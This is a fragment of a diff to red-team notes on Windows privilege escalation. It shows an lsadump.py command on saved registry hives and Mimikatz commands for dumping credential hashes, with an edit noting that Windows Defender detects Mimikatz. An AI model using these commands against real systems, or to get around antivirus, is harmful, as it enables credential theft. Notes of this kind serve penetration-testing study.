lw8192/Red-Team-Rising/Windows/Windows_Priv_Esc.md

      lsadump.py sys_backup.hiv sec_backup.hiv

-Extract hashes with Mimikatz (Windows Defender will catch this):
+Extract hashes with Mimikatz (Windows Defender will catch this so it's better to use the below method):

      privilege::debug
      token::elevate